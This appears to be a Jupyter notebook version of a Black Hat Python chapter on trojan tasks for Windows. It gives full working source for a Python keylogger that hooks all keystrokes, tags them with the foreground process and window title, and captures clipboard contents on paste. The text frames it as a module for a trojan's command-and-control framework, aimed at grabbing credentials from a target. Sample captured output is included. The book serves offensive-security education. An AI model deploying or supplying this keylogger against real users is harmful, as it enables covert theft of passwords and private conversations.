<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C8-Common_Trojaning_Tasks_On_Windows/Keylogging_For_Fun_And_Keystrokes.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# *__Common Trojaning Tasks On Windows__*

When you deploy a trojan, you may want to perform a few common tasks with it: Grab keystrokes, take screenshots, and execute shellcode to provide an interactive session to tools like __CANVAS__ or __Metasploit__. This chapter focuses on performing these tasks on Windows systems. We'll wrap things up with some sandbox detection techniques to determine if we are running within an antivirus or forensics sandbox. These modules will be easy to modify and will work within the trojan framework developed in Chapter 7. In later chapters, we'll explore privilege escalation techniques that you can deploy with your trojan. Each technique comes with its own challenges and probability of being caught, either by the end user or an antivirus solution.
We recommend that you carefully model your target after you've implanted your trojan so that you can test the modules in your lab before trying them on a live target. Let's get started by creating a simple keylogger.

### *__Keylogging for Fun and Keystrokes__*

__Keylogging__, the use of a concealed program to record consecutive keystrokes, is one of the oldest tricks in the book, and it's still employed with various levels of stealth today. Attackers still use it because it's extremely effective at capturing sensitive information such as credentials or conversations.

An excellent Python library named __PyWinHook__ enables us to easily trap all keyboard events (https://pypi.org/project/pyWinhook/). __PyWinHook__ is a fork of the orginal __PyHook__ library and is updated to support Python 3. It takes advantage of the native Windows function __SetWindowsHookEx__, which allows us to install a user-defined function to be called for certain Windows events. By registering a hook for keyboard events, we'll be able to trap all of the keypresses that a target issues. On top of this, we'll want to know exactly what process they are executing these keystrokes against so that we can determine when usernames, passwords, or other tidbits of useful information are entered.

__PyWinHook__ takes care of all of the low-level programming for use, which leaves the core logic of the keystroke logger up to us. Let's crack open __keylogger.py__ and drop in some of the plumbing:

In [ ]:
from ctypes import byref, create_string_buffer, c_ulong, windll
from io import StringIO

import os
import pythoncom
import pyWinhook as pyHook
import sys
import time
import win32clipboard

TIMEOUT = 60*10

class KeyLogger:
    def __init__(self):
        self.current_window = None

    def get_current_process(self):
        hwnd = windll.user32.GetForegroundWindow() #[1]
        pid = c_ulong(0)
        windll.user32.GetWindowThreadProcessId(hwnd, byref(pid)) #[2]
        process_id = f'{pid.value}'

        executable = create_string_buffer(512)
        h_process = windll.kernel32.OpenProcess(0x400|0x10, False, pid) #[3]
        windll.psapi.GetModuleBaseNameA(h_process, None, byref(executable, 512)) #[4]

        window_title = create_string_buffer(512)
        windll.user32.GetWindowTextA(hwnd, byref(window_title), 512) #[5]

        try:
            self.current_window = window_title.value.decode()
        except UnicodeDecodeError as e:
            print(f'{e}: window name unknown')

        print('\n', process_id, executable.value.decode(), self.current_window)

        windll.kernel32.CloseHandle(hwnd)
        windll.kernel32.CloseHandle(h_process)

All right! We define a constant, __TIMEOUT__, create a new class, __KeyLogger__, and write the __get_current_process__ method that will capture the active window and its associated process ID. Within that method, we first call __GetForeGroundWindow__ __[1]__, which returns a handle to the active window on the target's desktop. Next we pass that handle to the __GetWindowThreadProcessId__ __[2]__ function to retrieve the windows's process ID. We then open the process __[3]__, and using the resulting process handle, we find the actual executable name __[4]__ of the process. The final step is to grab the full text of the window's title bar using the __GetWindowTextA__ __[5]__ function. At the end of this helper method, we output all of the information __[6]__ in a nice header so that you can clearly see which keystrokes went with which process and window. Now let's put the meat of our keystroke logger in place to finish it off:

In [ ]:
    def mykeystroke(self, event):
        if event.WindowName != self.current_window: #[1]
            self.get_current_process()
        if 32 < event.Ascii < 127: #[2]
            print(chr(event.Ascii), end='')
        else:
            if event.Key == 'V': #[3]
                win32clipboard.OpenClipboard()
                value = win32clipboard.GetClipboardData()
                win32clipboard.CloseClipboard()
                print(f'[PASTE] - {value}')
            else:
                print(f'{event.Key}')
        return True

def run():
    save_stdout = sys.stdout
    sys.stdout = StringIO()

    kl = KeyLogger()
    hm = pyHook.HookManager() #[4]
    hm.KeyDown = kl.mykeystroke #[5]
    hm.HookKeyboard() #[6]

    while time.thread_time() < TIMEOUT:
        pythoncom.PumpWaitingMessages()

    log = sys.stdout.getvalue()
    sys.stdout = save_stdout
    return log

if __name__ == '__main__':
    print(run())
    print('done.')

Let's break this down, starting with the __run__ function. In Chapter 7, we created modules that a compromised target could run. Each module had an entry-point function called __run__, so we write this keylogger to follow the same pattern and we can use it in the same way. The __run__ function in the command-and-control system from Chapter 7 takes no arguments and returns its output. To match that behavior here, we temporarily switch __stdout__ to a file-like object, __StringIO__. Now, everything written to __stdout__ will go to that object, which we will query later.

After switching __stdout__, we create the __KeyLogger__ object and define the PyWinHook __HookManager__ __[4]__. Next, we bind the __KeyDown__ event to the __KeyLogger__ callback method __mykeystroke__ __[5]__. We then instruct PyWinHook to hook all keypresses __[6]__ and continue execution until we time out. Whenever the target presses a key on the keyboard, our __mykeystroke__ method is called with an event object as its parameter. The first thing we do in __mykeystroke__ is check if the user has changed windows __[1]__, and if so, we acquire the new window's name and process information. We then look at the keystroke that was issued __[2]__, and if it falls within the ASCII-printable range, we simply print it out. If it's a modifier (such as the __SHIFT__, __CTRL__, or __ALT__ key) or any other nonstandard key, we grab the key name from the event object. We also check if the user is performing a paste operation __[3]__, and if so, we dump the contents of the clipboard. The callback function wraps up by returning __True__ to allow the next hook in the chain, if there is one, to process the event. Let's take it for a spin!

### *__Kicking the Tires__*

It's easy to test our keylogger. Simply run it and then start using Windows normally. Try using your web browser, calculator, or any other application and then view the results in your terminal:

```
C:\Users\tim> python keylogger.py

  6852 WindowsTerminal.exe Windows PowerShell
Return
test
Return

  18149 firefox.exe Mozilla Firefox
nostarch.com
Return

  5116 cmd.exe Command Prompt
calc
Return

  3004 ApplicationFrameHost.exe Calculator
1 Lshift
+1
Return
```

You can see that we typed the word __test__ into the main window where the keylogger script ran. We then fired up Firefox, browsed to nostarch.com, and ran some other applications. We can now safely say that we've added our key-logger to our bag of trojaning tricks! Let's move on to taking screenshots.